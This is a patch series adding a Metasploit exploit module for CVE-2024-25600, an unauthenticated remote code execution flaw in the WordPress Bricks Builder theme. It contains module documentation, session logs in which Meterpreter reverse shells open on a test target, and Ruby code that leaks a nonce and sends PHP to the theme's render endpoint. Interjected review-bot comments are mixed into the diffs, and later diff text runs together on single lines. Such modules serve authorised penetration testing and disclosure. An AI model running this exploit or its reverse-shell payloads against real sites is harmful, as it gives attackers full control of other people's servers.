From f04b66d6dd30b0878cbc75330cd54c46bf1ae3b9 Mon Sep 17 00:00:00 2001
From: Balgogan
Date: Mon, 26 Feb 2024 22:07:15 +0100
Subject: [PATCH 01/10] Add wp_bricks_builder_rce
---
 data/wordlists/wp-exploitable-themes.txt | 1 +
 .../multi/http/wp_bricks_builder_rce.md | 160 ++++++++++++++++++
 .../multi/http/wp_bricks_builder_rce.rb | 130 ++++++++++++++
 3 files changed, 291 insertions(+)
 create mode 100644 documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md
 create mode 100644 modules/exploits/multi/http/wp_bricks_builder_rce.rb
diff --git a/data/wordlists/wp-exploitable-themes.txt b/data/wordlists/wp-exploitable-themes.txt
index e04c39a9e054..49db1b2188dd 100644
--- a/data/wordlists/wp-exploitable-themes.txt
+++ b/data/wordlists/wp-exploitable-themes.txt
@@ -1,2 +1,3 @@
 holding_pattern
 wplms
+bricks
diff --git a/documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md b/documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md
new file mode 100644
index 000000000000..c2d5f6518c3e
--- /dev/null
+++ b/documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md
@@ -0,0 +1,160 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in Bricks Builder Theme, versions prior to 1.9.6.
+The vulnerability allows attackers to execute arbitrary PHP code by leveraging
+a nonce leakage to bypass authentication and exploit the eval() function usage within the theme.
+
+To replicate a vulnerable environment for testing:
+
+1. Install WordPress.
+2. Download and install the Bricks Builder Theme, ensuring the version is below 1.9.6.
+3. Activate Bricks Builder.
+4. Create a model with a default page (to ensure the nonce is on index.php, add some elements).
+
+## Verification Steps
+
+1. Set up a WordPress instance with the Bricks Builder Theme (version < 1.9.6).
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/wp_bricks_builder_rce`.
+4. Set `RHOSTS` to the local IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload.
+
+## Options
+
+No option
+
+## Scenarios
+
+### Successful Exploitation Against Local WordPress with Bricks Builder Theme 1.8
+
+**Setup**:
+
+- Local WordPress instance with Bricks Builder Theme version 1.8.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module:
+```
+use exploit/multi/http/wp_bricks_builder_rce
+```
+4. Set `RHOSTS` to the local IP (e.g., 192.168.1.10).
+5. Configure other necessary options (TARGETURI, SSL, etc.).
+6. Launch the exploit:
+```
+exploit
+```
+
+**Expected Results**:
+
+- The module attempts to retrieve a nonce from the local server.
+- It then uploads and executes the payload.
+- If successful, control over the local WordPress instance is gained, depending on the payload used.
+
+**Example**:
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```
+msf6 > search bricks
+
+Matching Modules
+================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/multi/http/wp_bricks_builder_rce 2024-02-19 excellent Yes Unauthenticated RCE in Bricks Builder Theme
+
+
+Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_bricks_builder_rce
+
+msf6 > use 0
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_bricks_builder_rce) > options
+
+Module options (exploit/multi/http/wp_bricks_builder_rce):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
+ html
+ RPORT 443 yes The target port (TCP)
+ SSL true no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes The URI path to WordPress
+ VHOST no HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+ FETCH_DELETE false yes Attempt to delete the binary after execution
+ FETCH_FILENAME ilPaBylkCKr no Name to use on remote system when storing payload; cannot contain spaces or slashes
+ FETCH_SRVHOST no Local IP to use for serving payload
+ FETCH_SRVPORT 8080 yes Local port to use for serving payload
+ FETCH_URIPATH no Local URI to use for serving payload
+ FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces
+ LHOST 192.168.1.5 yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_bricks_builder_rce) > set ssl false
+[!] Changing the SSL option's value may require changing RPORT!
+ssl => false
+msf6 exploit(multi/http/wp_bricks_builder_rce) > set rhosts localhost
+rhosts => localhost
+msf6 exploit(multi/http/wp_bricks_builder_rce) > set rport 8888
+rport => 8888
+msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Nonce retrieved: 953563d296
+[*] Sending stage (3045380 bytes) to 172.20.0.2
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.2:39856) at 2024-02-26 21:51:11 +0100
+
+meterpreter > sysinfo
+Computer : 172.20.0.2
+OS : Debian 11.8 (Linux 6.4.10-060410-generic)
+Architecture : x64
+BuildTuple : x86_64-linux-musl
+Meterpreter : x64/linux
+meterpreter >
+```
+
+With `php/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/wp_bricks_builder_rce) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Nonce retrieved: 953563d296
+[*] Sending stage (39927 bytes) to 172.20.0.2
+[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.2:49678) at 2024-02-26 22:02:56 +0100
+
+meterpreter > sysinfo
+Computer : 65e1e703e433
+OS : Linux 65e1e703e433 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb
new file mode 100644
index 000000000000..7f264cd973b5
--- /dev/null
+++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb 
@@ -0,0 +1,130 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HTTP::Wordpress
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Unauthenticated RCE in Bricks Builder Theme',
+ 'Description' => %q{
+ This module exploits an unauthenticated remote code execution vulnerability in the
+ Bricks Builder Theme versions <= 1.9.6 for WordPress. The vulnerability allows attackers
+ to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and
+ exploit the eval() function usage within the theme. Successful exploitation allows for full
+ control of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher.
+ },
+ 'Author' => [
+ 'Calvin Alkan', # Vulnerability discovery
+ 'Valentin Lobstein' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['CVE', '2024-25600'],
+ ['URL', 'https://github.com/Chocapikk/CVE-2024-25600'],
+ ['URL', 'https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6'],
+ ['WPVDB', 'afea4f8c-4d45-4cc0-8eb7-6fa6748158bd']
+ ],
+ 'DisclosureDate' => '2024-02-19',
+ 'Notes' => {
+ 'Stability' => [ CRASH_SAFE ],
+ 'SideEffects' => [ IOC_IN_LOGS ],
+ 'Reliability' => [ REPEATABLE_SESSION ]
+ },
+ 'DefaultOptions' => {
+ 'SSL' => true,
+ 'RPORT' => 443
+ },
+ 'Platform' => ['unix', 'linux', 'win', 'php'],
+ 'Arch' => [ARCH_PHP, ARCH_CMD],
+ 'Targets' => [['Automatic', {}]],
+ 'Privileged' => false
+ )
+ )
+
+ register_options([
+ OptString.new('TARGETURI', [true, 'The URI path to WordPress', '/']),
+ ])
+ end
+
+ def send_payload(nonce, check)
+ code_to_add = if check
+ 'throw new Exception("END");'
+ elsif payload_instance.arch.include?(ARCH_PHP)
+ payload.encoded
+ else
+ "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"
+ end
+ php_code = ""
+
+ uri = normalize_uri(target_uri.path, 'index.php')
+ payload_data = {
+ 'postId' => rand(1..10000).to_s,
+ 'nonce' => nonce,
+ 'element' => {
+ 'name' => 'code',
+ 'settings' => {
+ 'executeCode' => 'true',
+ 'code' => php_code
+ }
+ }
+ }.to_json
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'ctype' => 'application/json',
+ 'data' => payload_data,
+ 'vars_get' => {
+ 'rest_route' => '/bricks/v1/render_element'
+ }
+ )
+
+ return nil unless res && res.code == 200
+
+ check ? !res.body.match(/Exception: (.*?)END/).nil? : res.body
+ end
+
+ def fetch_nonce
+ uri = normalize_uri(target_uri.path)
+ res = send_request_cgi('method' => 'GET', 'uri' => uri)
+ return nil unless res&.code == 200
+
+ script_tag_match = res.body.match(%r{})
+ return nil unless script_tag_match
+
+ script_content = script_tag_match[1]
+ nonce_match = script_content.match(/"nonce":"([a-f0-9]+)"/)
+ nonce_match ? nonce_match[1] : nil
+ end
+
+ def exploit
+ return unless wordpress_and_online?
+
+ nonce = fetch_nonce or begin
+ print_error('Failed to retrieve nonce. Exiting...')
+ return
+ end
+
+ print_good("Nonce retrieved: #{nonce}")
+ send_payload(nonce, false)
+ end
+
+ def check
+ return CheckCode::Unknown unless wordpress_and_online?
+
+ nonce = fetch_nonce
+ return CheckCode::Unknown unless nonce
+ return CheckCode::Vulnerable if send_payload(nonce, true)
+
+ CheckCode::Safe
+ end
+end
From 9f87510b50035e55f0657be017ee5bf266cfbfa5 Mon Sep 17 00:00:00 2001
From: Balgogan
Date: Wed, 28 Feb 2024 20:02:31 +0100
Subject: [PATCH 02/10] Optimize code structure and enhance vulnerability check
---
 .../multi/http/wp_bricks_builder_rce.rb | 42 +++++++++----------
 1 file changed, 19 insertions(+), 23 deletions(-)
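Review bot: The affected-version range in `'Description'` ("versions <= 1.9.6", with an upgrade to 1.9.6.1 recommended) does not match the module documentation added in the same patch, which says "versions prior to 1.9.6", "below 1.9.6" and "version < 1.9.6". Someone using either text to judge whether a site on exactly 1.9.6 is exposed gets two different answers. Use one statement in both places; if 1.9.6.1 is the first fixed release, as the description and the snicco reference URL suggest, the documentation lines should read `versions up to and including 1.9.6`.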
diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index 7f264cd973b5..e9386eeb603f 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -49,20 +49,16 @@ def initialize(info = {}) 'Privileged' => false ) ) - - register_options([ - OptString.new('TARGETURI', [true, 'The URI path to WordPress', '/']), - ]) end - def send_payload(nonce, check) - code_to_add = if check - 'throw new Exception("END");' - elsif payload_instance.arch.include?(ARCH_PHP) - payload.encoded - else - "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));" - end + def send_payload(nonce) + code_to_add = + if payload_instance.arch.include?(ARCH_PHP) + payload.encoded + else + "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));" + end + php_code = "" uri = normalize_uri(target_uri.path, 'index.php') @@ -107,24 +103,24 @@ def fetch_nonce end def exploit - return unless wordpress_and_online? - - nonce = fetch_nonce or begin - print_error('Failed to retrieve nonce. Exiting...') - return - end + nonce = fetch_nonce + return print_error('Failed to retrieve nonce. Exiting...') unless nonce print_good("Nonce retrieved: #{nonce}") - send_payload(nonce, false) + send_payload(nonce) end def check return CheckCode::Unknown unless wordpress_and_online? - nonce = fetch_nonce - return CheckCode::Unknown unless nonce - return CheckCode::Vulnerable if send_payload(nonce, true) + wp_version = wordpress_version + print_status("WordPress Version: #{wp_version}") if wp_version + + theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1') + return CheckCode::Safe unless theme_check_code.code == 'appears' - CheckCode::Safe + theme_version = theme_check_code.details[:version] + print_good("Detected Bricks theme version: #{theme_version}") + CheckCode::Appears end end 
From b3d45f7d9bd466c0eb157b0dc5d9644725966430 Mon Sep 17 00:00:00 2001 From: Balgogan Date: Wed, 28 Feb 2024 20:16:14 +0100 Subject: [PATCH 03/10] Fix oversight and further optimize code execution --- .../multi/http/wp_bricks_builder_rce.rb | 59 +++++++------------ 1 file changed, 20 insertions(+), 39 deletions(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index e9386eeb603f..80f162579829 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -51,44 +51,6 @@ def initialize(info = {}) ) end - def send_payload(nonce) - code_to_add = - if payload_instance.arch.include?(ARCH_PHP) - payload.encoded - else - "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));" - end - - php_code = "" - - uri = normalize_uri(target_uri.path, 'index.php') - payload_data = { - 'postId' => rand(1..10000).to_s, - 'nonce' => nonce, - 'element' => { - 'name' => 'code', - 'settings' => { - 'executeCode' => 'true', - 'code' => php_code - } - } - }.to_json - - res = send_request_cgi( - 'method' => 'POST', - 'uri' => uri, - 'ctype' => 'application/json', - 'data' => payload_data, - 'vars_get' => { - 'rest_route' => '/bricks/v1/render_element' - } - ) - - return nil unless res && res.code == 200 - - check ? !res.body.match(/Exception: (.*?)END/).nil? : res.body - end - def fetch_nonce uri = normalize_uri(target_uri.path) res = send_request_cgi('method' => 'GET', 'uri' => uri) 
@@ -107,7 +69,26 @@ def exploit return print_error('Failed to retrieve nonce. Exiting...') unless nonce print_good("Nonce retrieved: #{nonce}") - send_payload(nonce) + + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'ctype' => 'application/json', + 'data' => { + 'postId' => rand(1..10000).to_s, + 'nonce' => nonce, + 'element' => { + 'name' => 'code', + 'settings' => { + 'executeCode' => 'true', + 'code' => "" + } + } + }.to_json, + 'vars_get' => { + 'rest_route' => '/bricks/v1/render_element' + } + ) end def check From 45ae984dc12be885722c5d1d66ec555da0776cf0 Mon Sep 17 00:00:00 2001 From: Balgogan Date: Wed, 28 Feb 2024 20:30:58 +0100 Subject: [PATCH 04/10] Add additional verification step --- modules/exploits/multi/http/wp_bricks_builder_rce.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index 80f162579829..a4d5611eb331 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -98,10 +98,12 @@ def check print_status("WordPress Version: #{wp_version}") if wp_version theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1') + return CheckCode::Unknown unless theme_check_code return CheckCode::Safe unless theme_check_code.code == 'appears' theme_version = theme_check_code.details[:version] print_good("Detected Bricks theme version: #{theme_version}") CheckCode::Appears end + end From 1f05f9a0f165987105459680b67b7df844526717 Mon Sep 17 00:00:00 2001 From: Balgogan Date: Fri, 1 Mar 2024 14:36:13 +0100 Subject: [PATCH 05/10] Add recommendation --- modules/exploits/multi/http/wp_bricks_builder_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index a4d5611eb331..d76fc5309988 100644 
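Review bot: `'SideEffects' => [ IOC_IN_LOGS ]` is declared in `initialize`, but the request now inlined in `exploit` (hunk `@@ -107,7 +69,26 @@`) has no comment saying what the log artifact actually is. A one-line comment above the `send_request_cgi(` call would document it for reviewers and for defenders reading the module, for example `# IOC: a POST to index.php with rest_route=/bricks/v1/render_element is what the web server access log will show`. `exploit` begins above this hunk, so the preceding nonce fetch is not visible here.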
--- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -66,7 +66,7 @@ def fetch_nonce def exploit nonce = fetch_nonce - return print_error('Failed to retrieve nonce. Exiting...') unless nonce + fail_with(Failure::NoAccess, 'Failed to retrieve nonce. Exiting...') unless nonce print_good("Nonce retrieved: #{nonce}") From 85e27b0bc3dd1065eebe4eb5298415366845976d Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Tue, 26 Mar 2024 20:39:04 +0100 Subject: [PATCH 06/10] Update modules/exploits/multi/http/wp_bricks_builder_rce.rb Co-authored-by: jheysel-r7 --- .../multi/http/wp_bricks_builder_rce.rb | 30 ++++++++++++++++++- 1 file changed, 29 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index d76fc5309988..80a88504a7fe 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -45,7 +45,35 @@ def initialize(info = {}) }, 'Platform' => ['unix', 'linux', 'win', 'php'], 'Arch' => [ARCH_PHP, ARCH_CMD], - 'Targets' => [['Automatic', {}]], + 'Targets' => [ + [ + 'PHP In-Memory', + { + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }, + 'Type' => :php_memory + } + ], + [ + 'Unix In-Memory', + { + 'Platform' => ['unix', 'linux'], + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' }, + 'Type' => :unix_memory + } + ], + [ + 'Windows In-Memory', + { + 'Platform' => 'win', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' }, + 'Type' => :win_memory + } + ], + ], 'Privileged' => false ) ) From 8a1290c8a6cf9a5a0b5937e45d3a74712c063ecb Mon Sep 17 00:00:00 2001 
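Review bot: Replacing the single `Automatic` target with three named targets (hunk `@@ -45,7 +45,35 @@`) leaves the module documentation from the first patch out of date: its scenario output still lists `0 Automatic` under "Exploit target", and none of the later patches on this page touch that file. The three `'Type'` symbols (`:php_memory`, `:unix_memory`, `:win_memory`) are also not read anywhere in the hunks shown, so either drop them or add a comment such as `# 'Type' is informational only; exploit does not branch on it`. The hunk sits inside `initialize`, whose start and end are outside it.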
From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Tue, 26 Mar 2024 20:39:23 +0100 Subject: [PATCH 07/10] Update modules/exploits/multi/http/wp_bricks_builder_rce.rb Co-authored-by: jheysel-r7 --- modules/exploits/multi/http/wp_bricks_builder_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index 80a88504a7fe..d7a0aef36869 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -120,7 +120,7 @@ def exploit end def check - return CheckCode::Unknown unless wordpress_and_online? + return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online? wp_version = wordpress_version print_status("WordPress Version: #{wp_version}") if wp_version From 672036f53ae9d728fbc3284e73a321973a96f9e3 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Tue, 26 Mar 2024 20:39:33 +0100 Subject: [PATCH 08/10] Update modules/exploits/multi/http/wp_bricks_builder_rce.rb Co-authored-by: jheysel-r7 --- modules/exploits/multi/http/wp_bricks_builder_rce.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index d7a0aef36869..ccee7c8838cc 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb 
@@ -126,8 +126,9 @@ def check print_status("WordPress Version: #{wp_version}") if wp_version theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1') - return CheckCode::Unknown unless theme_check_code - return CheckCode::Safe unless theme_check_code.code == 'appears' + return CheckCode::Unknown('The Brick Builders theme does not appear to be installed') unless theme_check_code + return CheckCode::Detected('The Brick Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected' + return CheckCode::Safe("The Brick Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears' theme_version = theme_check_code.details[:version] print_good("Detected Bricks theme version: #{theme_version}") From abc39e86f9fd2058632580282b1a2b9187e4a4d1 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Tue, 26 Mar 2024 20:40:04 +0100 Subject: [PATCH 09/10] Update modules/exploits/multi/http/wp_bricks_builder_rce.rb Co-authored-by: jheysel-r7 --- modules/exploits/multi/http/wp_bricks_builder_rce.rb | 4 ---- 1 file changed, 4 deletions(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index ccee7c8838cc..a10e4098b1e2 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -39,10 +39,6 @@ def initialize(info = {}) 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] }, - 'DefaultOptions' => { - 'SSL' => true, - 'RPORT' => 443 - }, 'Platform' => ['unix', 'linux', 'win', 'php'], 'Arch' => [ARCH_PHP, ARCH_CMD], 'Targets' => [ From b9b4a624d94c66d66abc3542694e047d0a9a34c3 Mon Sep 17 00:00:00 2001 
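Review bot: In `check` (hunk `@@ -126,8 +126,9 @@`), any result whose code is neither 'detected' nor 'appears' is reported as `CheckCode::Safe`, and that can include the case where the theme stylesheet could not be read at all. The `unless theme_check_code` guard only catches `nil`; if `check_theme_version_from_style` returns a `CheckCode::Unknown` object on a failed request (I believe the mixin does, please confirm), that result reaches the `Safe` line with `details[:version]` empty and an unverified site is reported as not vulnerable. Widen the first guard, e.g. `return CheckCode::Unknown('Could not determine whether the theme is installed') if theme_check_code.nil? || theme_check_code.code == 'unknown'`. The same three lines recur in the typo-fix hunk at `@@ -122,12 +122,12 @@`, and `check` starts above this hunk.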
From: Balgogan Date: Tue, 26 Mar 2024 21:05:35 +0100 Subject: [PATCH 10/10] Fix typos --- modules/exploits/multi/http/wp_bricks_builder_rce.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index a10e4098b1e2..526cf374123b 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -122,12 +122,12 @@ def check print_status("WordPress Version: #{wp_version}") if wp_version theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1') - return CheckCode::Unknown('The Brick Builders theme does not appear to be installed') unless theme_check_code - return CheckCode::Detected('The Brick Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected' - return CheckCode::Safe("The Brick Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears' + return CheckCode::Unknown('The Bricks Builder theme does not appear to be installed') unless theme_check_code + return CheckCode::Detected('The Bricks Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected' + return CheckCode::Safe("The Bricks Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears' theme_version = theme_check_code.details[:version] - print_good("Detected Bricks theme version: #{theme_version}") + print_good("Detected Bricks Builder theme version: #{theme_version}") CheckCode::Appears end